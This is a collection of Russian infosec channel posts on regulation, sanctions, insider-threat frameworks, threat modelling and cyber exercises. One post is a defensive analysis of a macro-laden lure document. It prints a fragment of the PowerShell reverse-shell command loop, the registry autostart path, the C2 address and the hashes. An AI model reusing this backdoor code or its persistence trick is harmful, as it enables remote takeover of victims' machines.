Почему авторы новых шифровальщиков 🤒 все чаще самостоятельно пишут криптографическую подсистему и особенно подчеркивают это при рекламе своих изделий? И почему они, если верить, что многие из России 🇷🇺, не используют отечественные криптографические алгоритмы? Почему такой непатриотизм?
Я тут услышал версию, что это однозначно выдает в авторах шифровальщиков сотрудников ФСБ 🇷🇺, которые законопослушны и не могут применять отечественный ГОСТ, не сертифицировав конечное изделие в 8-м Центре. А я возразил, что если бы это были сотрудники ФСБ, то они бы точно не стали использовать американский стандарт шифрования 🔐, да еще и вывозить готовое СКЗИ из страны, не получив на это экспортную лицензию. Да и вообще, по мнению ФСБ все, что не использует отечественные криптографические алгоритмы, не считается у нас СКЗИ и вообще спецслужбе не интересно 🤷♀️
ЗЫ. Все написанное выше - шутка 😂 Кроме реальных скриншотов рекламы шифровальщиков!
В 18.00 доклад 18+ в лектории «Кибербезопасность» в 18х18 м от стенда Позитива в направлении зюйд-зюйд-вест!
Читать полностью…Я тут вчитался в текст закона про блогеров-десятитысячников (303-ФЗ) и понял, что тупость пишущих законы прогрессирует, а мем про Интернет на дискетке скоро станет реальностью 🤦♂️ Ведь что пишут депутаты, если перевести это на нормальный русский язык, - вы не можете репостить ничего от блогеров-десятитысячников, что не внесено в реестр Роскомпозора. То есть проблема закона не в том, что невнесенные в реестр не могут размещать рекламу и получать донаты, а в том, что круг тех, кого можно репостить и на кого ссылаться, ограничен очень небольшим числом тех, кто попал в реестр 🆒
Вот захочу я, например, репостнуть про окончание 18-го августа приема заявок на стажировки в Positive Technologies и смогу это сделать только если корпоративный канал 🟥 будет внесен в реестр РКН. А вот мемасики от POSIdev могу репостить без ограничений. А все потому, что в одном канале больше 10 тысяч пользователей, а в другом - меньше 🤓
Как репостить из зарубежных соцсетей, включая и Telegram? ❓ А вот это самое интересное. По мнению одного из авторов закона, депутата Хинштейна, который никак с женой не разберется, которая в запрещенный в России Instagram до сих пор постит, совершенно неважно, кем и где написан текст. Важно, что он доступен из России, а значит на него распространяется новый закон. А значит репостить материалы ЛЮБОЙ зарубежной соцсети будет нельзя 🤠 Кто не зарегается в РКН, того страницу заблокируют. Если соцсеть откажется блокировать страницу и ее автора, ее заблокируют саму 👮
российские законы
не трудись понять
дважды два четыре
но немножко пять
ЗЫ. Может канал начать дробить, как г-жа Блиновская свои доходы? Завести каналы по 9999 пользователей и ограничить верхнюю планку подписчиков? 🤬 Но репостить все равно будет нельзя.
Пару-тройку лет назад около 20% иностранных сайтов блокировали доступ с российских IP-адресов 🤬 (думаю, что сейчас число таких ресурсов еще больше), что требовало поиска методов решения этой задачи. И не так чтобы их было много. Прокси, VPN, режим инкогнито (с оговорками).
Я эту проблему для себя решил, но гарантий, что мой вариант продержится еще долго, нет. Поэтому я держу руку на пульсе и слежу за новыми VPN, которые появляются в Интернете. И вот мне попался свежий сервис сравнения нескольких десятков VPN по 40 различным критериям. Так что если вам нужен доступ к обучающим и новостным ресурсам по ИБ, то есть из чего выбрать. Правда, не со всеми проставленными оценками я согласен. Например, когда написано, что логи не ведутся 😂
Но в остальном, вполне себе. И пусть никакая иностранная зараза не заблокирует нам доступ к своим ресурсам 💪
‼️ Применять данные средства для обхода российских блокировок ни в коем случае нельзя ‼️
Число враждебных ИИ/LLM растет с каждым днем 🤖 - какие-то из них узкофункциональные, какие-то широкого применения, какие-то фейковые (и выманивают деньги у других киберпреступников), какие-то вполне рабочие 🤖 Вот тут очень неплохое исследование различных враждебных ИИ-моделей 🧠
Читать полностью…Надеюсь, никого не оскорбляет? И пропагандой не является? И демонстрацией способов обхода?
Читать полностью…Совет по международным отношениям опубликовал статью, в которой обсуждается усиливающаяся цифровая изоляция России 🇷🇺 и ее растущую зависимость от Китая 🇨🇳 Автор пишет, что после вторжения в Украину в 2022 году Россия все больше отрезана от западных технологий и компаний, что привело к активизации сотрудничества с Китаем в сфере технологий. Это создает новые уязвимости для России, особенно в области кибербезопасности и шпионажа против нее 👲
Также автор призывает США 🇺🇸 и их партнеров использовать разведданные из открытых источников, чтобы выявлять спрос России на китайские технологии. Эти данные можно получать из различных источников, включая российские конференции по кибербезопасности (где автор слышала, чтобы у нас про китайцев на ИБ-тусовках говорили?) и публичные контракты. Это поможет обнаружить уязвимые места, такие как зависимость от китайских полупроводников и смартфонов 🧑💻
Кроме того, предлагается американской разведке 🇺🇸 провести анализ технологий, таких как Astra Linux, используемых в российских военных системах, что может выявить потенциальные слабые места, которые США и их союзники могут использовать для получения преимуществ в киберпространстве.
!!р^д**н**c 🤔
Характерным примером того, как злоумышленники используют актуальные события для распространения вредоносных программ, может послужить обнаруженный нами вредоносный документ.
Он содержит текст муниципального правового акта, который не отображается корректно, в связи с чем пользователя побуждают «Включить содержимое» и разрешить таким образом выполнение встроенного в документ макроса.
Встроенный макрос приводит документ к читаемому виду путем простой замены комбинаций символов на буквы (;; → у ; ** → o ; ?? → a
и т. д.), а также извлекает и закрепляет в автозагрузке полезную нагрузку — достаточно простой реверс-шелл — в виде PowerShell-скрипта
.
Полезная нагрузка находится в содержимом документа после строки DigitalRSASignature
и состоит из двух частей, закодированных в Base64 и разделенных строкой CHECKSUM
— <part1>CHECKSUM<part2>
, которые декодируются и записываются в файлы:
• <part1> -> %USERPROFILE%\\UserCache.ini.hta
• <part2> -> %USERPROFILE%\\UserCache.ini
UserCache.ini.hta
прописывается макросом в автозапуск Windows Explorer
через ключ реестра HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\LOAD
. Назначение данного файла — запустить исполнение файла UserCache.ini
.UserCache.ini
представляет собой легковесный реверс-шелл, который использует узел 94.103.85.47
(Vdsina, Moscow) как управляющий сервер. Данный инструмент получает и выполняет набор команд с http://94.103.85.47:80/api/texts/<client_id>
, где <client_id> = <имя компьютера>_<имя пользователя>_<серийник тома жесткого диска>
.
Команды передаются в формате XML и содержат несколько атрибутов:
• CountRuns
— сколько раз нужно выполнить команду;
• Interval
— интервал ожидания в минутах между последовательными выполнениями одной команды;
• Module
— закодированная в Base64 команда.
...
try {
$Commands = [xml]$Configs;
$cycle_num = 0;
while($true){
$num_commands_completely_executed = 0;
$num_commands_executed = 0;
foreach ($CommandConfig in $Commands.Configs.Config)
{
$num_commands_executed += 1;
$quot = [int][Math]::Floor( $cycle_num / [int]$CommandConfig.Interval);
$rem = [int][Math]::Floor( $cycle_num % [int]$CommandConfig.Interval);
if($quot -lt [int]$Command.CountRuns -and $rem -eq 0){
$command_expr = FromBase64 $CommandConfig.Module;
try{
Invoke-Expression($command_expr);
}
catch {}
}
if(([int]$CommandConfig.Interval * [int]$CommandConfig.CountRuns) -lt [int]$cycle_num){
$num_commands_completely_executed += 1;
}
}
Start-Sleep 60;
if([int]$num_commands_completely_executed -eq [int]$num_commands_executed){
break;
}
$cycle_num += 1;
}
}
catch {}
...
Постановление_по_ГО_updated.doc
13252199b18d5257a60f57de95d8c6be7d7973df7f957bca8c2f31e15fcc947b
UserCache.ini.hta
e80e0b57cf3f304cb7d6dba4b0bb65da18f4d32770a3d6f3780fdab12d2617c9
UserCache.ini
ccff23a8f7c510b49264cdacf9ab6b43e9be0671670ce2eec75851920e6378b7
94.103.85.47
Проблема: сотрудники записывают свои пароли на стикеры и приклеивают их к мониторам 🖥
Способы решения:
➖ Compliance: Остановите это немедленно!
➖ Инженер ИБ: Давайте внедрим OTP!
➖ Риск-аналитик: Спрячьте стикер в ваш кошелек 👛
➖ Бизнес: Если это не приводит к катастрофическим последствиям, забейте 🤘
А вы какой вариант выберете?
Подсобрал некоторые из существующих фреймворков по угрозе от инсайдеров, индикаторам и техникам, методам обнаружения и защиты:
🔤 Insider Threat TTP Knowledge Base v2.0.0 (писал про него)
🔤 Insider Threat Matrix (малость подзаброшен)
🔤 Insider Threat Matrix (описан выше)
🔤 Common Sense Guide to Mitigating Insider Threats, Seventh Edition
🔤 FBI: The Insider Threat: An introduction to detecting and deterring an insider spy (больше фокусируется на различных индикаторах)
🔤 National Insider Threat Task Force (NITTF) от Национальной разведки США
🔤 Insider Attack Matrix
🔤 Insider Risk Management Program Evaluation (переложение NIST CSF на борьбу с инсайдерами от CISA)
Риэлторы-мошенники "развели" Ларису Долину на 130 миллионов рублей!.. 🤑 Да, это реальность! 40 миллионов, 130 миллионов, 27 миллионов, 60 миллионов, 43 миллиона... Суммы, которые получают мошенники 💻 измеряются уже десятками миллионов, что даже по международным меркам в топе. В США кибермошенничество с недвижимостью тоже на первом месте по объему хищений, но там суммы все-таки поменьше, обычно несколько сотен тысяч долларов, до полумиллиона 💸
Читать полностью…Знаете, в Cisco была такая практика, когда раз в квартал, какой-нибудь босс писал на всю компанию письмо ✍️ про то, какие мы все молодцы (даже если нет) и как у нас все хорошо (даже если нет) и мы скоро всех порвем (даже если нет). Во время COVID-19 такие письма сменили тональность и топ-менеджеры разного уровня стали в них писать о чем-то простом и понятном, рефлексируя 😭 публично и показывая всем, кто находится в непростой ситуации, что все в одной лодке. Схожая история была, когда в мире происходила какая-нибудь катастрофа или авария. Уже не знаю, были ли такие письма от души или по разнарядке, но создавалось впечатление, что руководство всегда на связи и всегда в курсе всего происходящего. А самое главное, что оно не бросает вас на произвол судьбы 🆘
И вот смотрю я на коммуникации в Курской области своим непрофессиональным взглядом, оцениваю то, что пишут официальные каналы руководителей разных населенных пунктов и субъектов, что пишут СМИ, что пишут в народных каналах... И понимаю, что чиновники не умеют в кризисные коммуникации от слова совсем ☹️ И PR-службы у них отвыкли от правильных коммуникаций, привыкнув только к победным реляциям 🥇 А жители не знают, куда бежать и кого слушать. Утром - "эвакуируйся", днем "все нормально", вечером "немедленно у*бывайте", а ночью "прежнее сообщение считать недействительным". Отсюда паника и очередные потоки брани в адрес руководства... 😫
К чему это я? Да к тому, что в управлении инцидентами, часть связанная с коммуникациями очень важна. Иногда даже важнее всего остального. А иначе люди будут попадаться на "фейковых боссов", "вам звонит мэр", "вам единовременная выплата от президента", "спасите свои средства, переведя их на резервный счет", "установите ПО для удаленной техподдержки"... В условиях выстроенных коммуникаций, мы начинаем додумывать и... совершать ошибки, чем и пользуются плохие парни в мире физическом и виртуальном.
Представьте, что вам предлагают через год возглавить ИБ-службу компании вашей мечты с подчинением генеральному директору 🧐 Рост зарплаты 10х, персональный помощник, большой кабинет с диванчиком с видом на парк, любые ИБ-«игрушки»… 🤑 Но при этом вы должны будете упахаться в течение года, чтобы получить знания и навыки, нужные для работы. Вы не сможете в течение года ездить в отпуск, встречаться с друзьями, ходить на выставки, в кино и рестораны. У вас даже не будет нормальных выходных. Все ваше время будет уходить на учебу 😫
Читать полностью…Когда участники "хакерских" конференций жалуются, что персонал отелей их гнобит, не любит, шмонает и т.п., они должны понимать, что они [участники] для персонала и есть угроза 👮 Такая же, как вредоносы, DDoS, RCE и т.п. - угрозы для ИБшников. И десятких фейковых точек доступа в отеле, неработающие банкоматы, взломанные системы цифрового контента, включающаяся ночью сигнализация - это проблема для других проживающих, коим не повезло снять номер в те же даты, что и BlackHat/DEFCON, а также и для самих отелей. У всех своя модель угроз 🤔
Читать полностью…Center for Threat-Informed Defense обновил свой проект Top ATT&CK Techniques, выпустив вторую версию спустя 2 года после первой. Концепция проекта не поменялась - вы задаете ряд условий применительно к вашей организации и "калькулятор" выдает вам ваш собственный Топ10, а не тот, который вам навязывают внешние компании, собирающие данные, как правило, с множества своих средств защиты (да, они видят картину шире, но могут не учитывать то, что актуально именно для вас).
Какие-то кардинальные изменения в проекте заметить сложно, но они есть. Используется версия матрицы 14.1 (правда, текущая сейчас уже 15.1), улучшили графический интерфейс. Также проект представляет пример Топ10 применительно к шифровальщикам - этот список составлялся экспертами CTID. Они, правда, обещали, что выпустят и другие Топ10, но пока кроме Ransomware Top10 Techniques ничего нет. Но и ждать чего-то совсем нового не стоит - все-таки основная логика у него под капотом и его надо просто использовать для составления списка основных техник и методов защиты от них.
Вы же помните, что 12-го сентября будет не только 29 лет термину "хакатон", но и вступят в силу очередные санкции США, согласно которым будет запрещено ⛔️ оказывать ИТ-услуги всем российским организациям? 🇺🇸 Я когда в июле рефлексировал на последнюю тему, то сделал два предположения:
1️⃣ Возможно расширительное толкование термина enterprise management software.
2️⃣ Возможно будут использовать блокировки по GeoIP 🤬
И вот вам яркий пример реализации обоих предположений. Известный многим сервис Miro, разработанный россиянами, с 12 сентября перестанет оказывать услуги в России, а в качестве определения "русскости" используются IP-адреса, с которых осуществлялся доступ к Miro в последние месяцы 🧑💻
Ну а дальше, как говорится в Евангелии от Луки (8:8): "Имеющий уши, да услышит!" С учетом новой информации стоит еще раз пересмотреть список ПО, происходящего из США, которое используется в деятельности служб ИБ. Чтобы 13 сентября (в США еще будет 12-е) у вас не началось со звонков "Мля, у нас ничего не работает" 🤓
Тут МТС в свой сервис "Защитник" добавил новую возможность - контроль утечек информации. Ну я и решил его попробовать. Сразу скажу, что впечатления неоднозначные и вот почему:
1️⃣ При подключении услуги и в течение нескольких дней после этого сервис у меня никаких утечек не обнаруживал. Предположу, что МТС просто обращается к внешнему сервису по API запросу и делает это не в онлайне (на самом деле я даже знаю, куда он обращается). Там бы четче написать, как работает сервис, а то я совершенно случайно зашел в приложение спустя пару недель и нашел там список утечек.
2️⃣ Когда сервис пишет, что произошла утечка из некоего банка, рекомендует сменить карту, но не говорит, что за банк, то это выглядит странновато. Из всех дальнейших утечек именно эта меня очень заинтересовала, но по ней нет вообще никаких деталей, чтобы предпринять какие-то действия. Интересно, что я не слышал про утечки из банков, которыми пользуюсь.
3️⃣ Утечка с портала Госуслуг?.. Все отрицают, что такая утечка имела место быть.
4️⃣ Утечка из ЕСИА? По ней совет, конечно, понятный, но я не знаю никого, кто бы пошел менять паспорт из-за утечки его персональных данных.
5️⃣ Последняя "утечка" интересна. Я никогда не регистрировался в интим-магазине, ни в российском, ни в зарубежных (несмотря про регулярные рассказы о взломах сексуальных игрушек). Кто-то явно хотел подшутить надо мной, указав мои персональные данные; тем более, что номер моего телефона узнать не так-то и сложно.
6️⃣ В списке преимущественно российские утечки, но даже они далеко не все. Я знаю, что по мне есть точно утечка в базе авиаперелетов, но в услуге от МТС ее нет. Из иностранных там затесался clubhouse, но вот куча остальных сервисов, которые показываются другими сервисами, там отсутствует.
7️⃣ Некоторые утечки вообще непонятны, что они из себя представляют. Например, "Пропуска". Что это? Откуда? Какие пропуска? Почему там мои паспортные данные?
В целом, впечатление неоднозначное. Недоработана услуга еще для эффективного использования. Но как еще один сервис в копилку, почему бы и нет. Все равно бесплатно (для МТС Premium). Если сложить выдаваемые им утечки с иностранными, то получится вполне себе набор.
Лукацкий или Агутин? Наверное, каждый, кто пойдет завтра (в субботу) на ИТ-Пикник Т-Банка задается таким вопросом 🤔 Но не надо гадать, идите на мое выступление "От стелек и кардиостимуляторов до умных пылесосов и колонок. Что делать с их небезопасностью?", а уже потом можно пойти послушать "босоногого мальчика" 🎤
Мое выступление будет в 18.00 в лектории "Кибербезопасность" 🛡 Передо мной будут с 13-ти часов выступать Евгений Волошин, Александра Котельникова, Сергей Голованов, Андрей Костин с докладами про OSINT, биометрию, ландшафт угроз, космические системы, а также дискуссия (Дмитрий Гадарь, Алексей Усанов, Александр Каледа, Дмитрий Евдокимов и Александо Ершов) и киберквиз от Кибердома 🤔
ЗЫ. У 🟥 также будет свой стенд, где будем много всяких активностей. Увидимся на ИТ-Пикнике 🤝
А вот тут ребятки из MIT взяли с полсотни существующих таксономий рисков и угроз, связанных с искусственным интеллектом, проанализировали их и разработали базу данных AI Risk Repository, содержащий свыше 700 ИИ-рисков. База данных сделана на базе Google Sheet и может быть переиспользована для своих нужд 🧠
Читать полностью…22 августа в 14.00 (мск) открою новый сезон позитивных вебинаров разговором о методах оценки эффективности аналитиков, процессов и инструментов, применяемых в SOC 📈. На трансляции вы узнаете:
1️⃣ Зачем и как измерять эффективность ИБ в целом и SOC в частности?
2️⃣ Какие показатели использовать для мониторинга, реагирования, threat intelligence, threat hunting и других процессов?
3️⃣ Можно ли уйти от измерения числа инцидентов, среднего времени реагирования и заменить их бизнес-ориентированными показателями?
4️⃣ Стоимость учетной записи в даркнет, количество негативных упоминаний в СМИ, предотвращенных недопустимых событий и другие примеры кумулятивных метрик для SOC?
5️⃣ Лайфхаки для оценки эффективности.
Вы получите ключевые метрики для оценки разных аспектов работы SOC, а в качестве бонуса — примеры из практики, которые помогут вам внедрить эти метрики в своей компании. Присоединяйтесь! 🤝
Тут австралийцы задались вопросом кибербезопасности дронов 🛸 и выпустили небольшой отчетик о том, какую роль БПЛА играют в ИБ, какие угрозы ИБ они несут, и как вообще эта тема регулируется в мире. Не то, чтобы открытие и вау, но как первый подход к снаряду вполне себе. Для начала разговора вполне подойдет 🛸
Читать полностью…Мда, маркетологам в забугорщине непросто приходится. Что не креатив, то потом извиняйся перед геями, лесбиянками, небинарными личностями, женщинами, афроамериканцами и афроафриканцами, коренными жителями США, католиками и протестантами, иудеями и православными... 🌈
Вот Palo Alto на DEFCON решило сделать живые торшеры, в качестве моделей для которых взяли молодых девушек 👩🏼 Еще 3-4 года назад ни у кого и мысли бы не возникло возмущаться - на выставках с преимущественно мужским контингентом полуголые грации, бодиарт, гимнастки под потолком... были в порядке вещей на всех материках, кроме, пожалуй Антарктиды 🌏 А вот тут случился облом, да такой, что генеральному директору ИБ-вендора пришлось публично извиниться перед всеми, кого обидела эта инсталляция. Или перформанс? Я все время их путаю.
А дальше ведь еще хуже будет. Точнее не креативно и скучно. Все будут бояться сделать что-то не то, что-то, что может обидеть или "тех", или "этих". А значит все будут серые и одинаковые, скучные и безликие... То ли дело у нас 😎 Правда, у нас другие проблемы.
Если вы вдруг вы, случайно, узнали, что к вам идет проверка, задача которой оценить ваш план реагирования на инциденты ✔️❌ (а у вас он должен быть согласно нормативке), а вы эту свою обязанность мягко говоря просрали, то рекомендую распечатать приведенную картинку и выдать ее за план реагирования! 💡
Во-первых, это действительно план действий, хоть и хреновый ☺️ Во-вторых, распечатка означает, что вы о задаче хотя бы думали и даже предприняли какие-то действия, а это уже лучше, чем "ну не смогла я". В-третьих, это смешно, а проверяющие тоже люди и они тоже могут посмеяться с вами и простить на первый раз! 😇
Но лучше, конечно, о плане позаботиться заранее! 😕
Видел я тут на дороге автомобильный 🚘 номер - А256ЕС. И подумал, что это, пожалуй, единственный, как мне кажется, вариант номера, который соответствует ГОСТу и имеет отношение к ИБ (256 бит ключа у алгоритма шифрования AES). Есть, конечно, варианты О152РУ (вместо 152 можно поставить и 187), но это уже больше притянуто за уши к ИБ. У американцев все-таки классная практика, когда ты за деньги можешь себе собственный автомобильный номер выбрать 🚗 Я бы себе что-нибудь ИБшное обязательно взял.
Читать полностью…У MITRE есть проект по матрице внутренних угроз, очень похожий по идеологии на MITRE ATT&CK. Но, как это ни странно, он такой далеко не единственный и нашлись желающие внести свою лепту в создание очередного фреймворка по борьбе с внутренней угрозой. При этом, это не просто "очередная матрица". В новом проекте, Insider Threat Matrix, речь идет не только о методах, используемых инсайдерами, но и о мотивах и используемых ими средствах, а также о мерах обнаружения и защиты такой внутренней активности 👺
Если MITRE ATT&CK делить атаку на 14 тактик, то в Insider Threat Matrix таких фаз всего 5:
1️⃣ Мотив. Приводится 16 различных причин, побуждающих инсайдера совершать свои черные дела (шпионаж, низкая осведомленность, персональная выгода, самосаботаж, человеческая ошибка и т.п.). Можно заметить, что в списке причин не только злонамеренные, но и случайные причины.
2️⃣ Намерение (желание). 19 различных обстоятельств, которые позволяют реализовать нарушение (наличие Bluetooth, установка ПО, печать, снимки экрана, web-доступ и т.п.).
3️⃣ Подготовка. 22 действия, осуществляемые для того, чтобы достигнуть цели по нанесению вреда (обфускация данных, архивация данных, приватный/инкогнито серфинг, чтение реестра Windows, тестирование возможности печати и т.п.).
4️⃣ Нарушение. 18 приносящих вред действия (кража, неавторизованная печать документов, выноси физического носителя, нарушение бизнес-операций, установка неразрешенного ПО и т.п.).
5️⃣ Защита от расследования (антифорензика). 16 действий для заметания следов (очистка артефактов в браузере, удаление учетной записи, удаление файлов, подмена логов, стеганография, удаление ПО и т.п.).
Кстати, о победных коммуникациях 🥳 Был у меня в практике случай, когда меня позвали провести штабные киберучения для топ-менеджеров в одну группу компаний. Я приехал обсуждать сценарии, ограничения, проверяемые болевые точки, список участников и т.п. В конце я спросил, есть ли у заказчика какие-либо вопросы и просьбы. И я их получил 😫
Заказчик в лице CISO попросил, чтобы в рамках штабных киберучений я не проверял ряд сценариев, а по итогам я должен был бы исключить все негативные моменты и показать только то, как компания отлично справляется с инцидентами ИБ ✊ На мой логичный вопрос, а в чем тогда смысл, если никто ничего не планирует менять в процессах ИБ, я получил ответ, что в бюджете киберучения заложены 🤑 и в планах на год CISO эту тему заявлял, но его руководство не любит негативных новостей ☹️ и поэтому надо построить всего лишь потемкинские деревни, а за красивой картинкой останется разруха. От таких киберучений я отказался, но сама по себе ситуация не уникальна.
Очень важно, перед началом штабных киберучений, да и любых других ИБ-проектов, задаваться двумя вопросами - "Зачем это надо делать?" и "Какого результата мы хотим/нам надо достичь?". И уже по результатам ответов принимать решение, ввязываться в эту историю или нет.
Во время штабных киберучений, которые я провожу достаточно часто, один из сценариев, которые я проверяю с участниками, - "Вам прилетело письмо от регулятора. Как вы убедитесь, что это письмо от него, а не фейк?" И надо сказать, что этот сценарий все проходят по-разному - кто-то успешно справляется с ответом и предлагает варианты взаимной аутентификации, а кто-то с удивлением задается вопросом: "А что, надо проверять письма от регулятора?".
И вот яркий пример из жизни, что да, надо проверять. Хакеры из группировки UAC-0198 от имени Службы безопасности Украины отправляли фишинговые сообщения различным государственным организациям страны, с помощью которых было заражено более 100 компьютеров вредоносом AnonVNC. О последствиях не сообщается.
Такие кейсы не новость - известны случаи фишинговых сообщения от Службы нацбезопасности Армении, от ФСТЭК, новозеландского CERT, ФинЦЕРТа и т.п. Так что если у вас еще нет соответствующего плейбука, самое время задуматься и уточнить:
❓ У почтовых доменов ваших регуляторов, включая региональные управления, включены DMARC, SPF, DKIM?
❓ У вас есть контакты сотрудников регуляторов, у которых вы можете проверить факт отправки вам сообщений или сделанных звонков?
❓ Вы знаете, как выглядят настоящие сообщения от регуляторов?
❓ Вы читали мою предыдущую заметку про плейбук для сообщений регуляторов?
Если вдруг вы ищете презентации с BlackHat и DEFCON 2024, то их есть у меня:
👨💻 BlackHat
👨💻 DEFCON
ЗЫ. Там уже бОльшая часть, но, возможно, будут еще что-то докладывать!
ЗЗЫ. Презентации и видео с PHD2 тоже недурны ☺️
Тут Денис Горчаков в VK поделился размышлениями о современных HR-практиках и отношении молодежи к работе, которые могут быть отнесены в полной мере и к ИБ. И эта запись на стене Дениса меня тригернула, расставив в моей седой голове 🧔🏼♂️ все по полочкам. Не буду переписывать все, что написал Денис, утащу только одну фразу, которая лежит в основе трудоустройства многих молодых людей:
"Я здесь за то, что хорошо умею делать, могу и буду работать над тем, что сейчас вам нужно. Я здесь потому, что по совокупности условий у вас сейчас лучшее для меня предложение, оно максимально отвечает моим интересам. А я, очевидно, наиболее остальных отвечаю вашим требованиям"
Center for Threat-Informed Defense анонсировал новый проект по описанию процесса моделирования атак на базе матрицы ATT&CK. В целом ничего нового нет - просто процесс разложили на 4 этапа и каждый подробно описали с соответствующими примерами.
Сами этапы вытекают из типовых 4 вопросов, которые обычно задаются при моделировании угроз и применяются во многих других методиках:
❓ Над чем мы работаем? На этом этапе мы описываем основные и второстепенные функции анализируемой системы и за счем декомпозиции выделяем ключевые активы системы.
❓ Что может пойти не так (что может произойти плохого)? На этом этапе мы определяем и приотизируем угрозы для активов, определенных на 1-м этапе. Причем делаем мы это не в абстрактных описаниях угроз, а в виде списка техник из матрицы MITRE ATT&CK.
❓ Что нам надо сделать с этим? Затем с помощью Mappings Explorer от CTID мы определяем защитные меры для определенных ранее техник.
❓ Мы сделали все хорошо? А тут мы тем или иным способом проверяем, что мы ничего не упустили, например, с помощью кибериспытаний.
Что мне понравилось в этой методологии, так это важный момент, когда вам надо совместить теорию и практику. Ведь если следовать, например, методике ФСТЭК, вы просто теоретизируете, опираясь на собственный опыт, как можно реализовать ту или иную угрозу. А у того же НКЦКИ или ФинЦЕРТа рассылаются просто бюллетени с индикаторами или, иногда, с техниками по ATT&CK, на базе реальных инцидентов. Но как это совместить?
Я уже несколько лет в курсе по моделированию угроз предлагаю вариант, схожий с тем, что сейчас прописал у себя CTID - сначала вы выбираете техники из реальных инцидентов, описанных в TI-бюллетенях (то, что CTID называет "доказательствами"/evidence), а потом добавляете туда уже то, что CTID называет "теорией"/theory. А затем уже оцениваете угрозы по этим двум параметрам (то, чего у меня в курсе нет).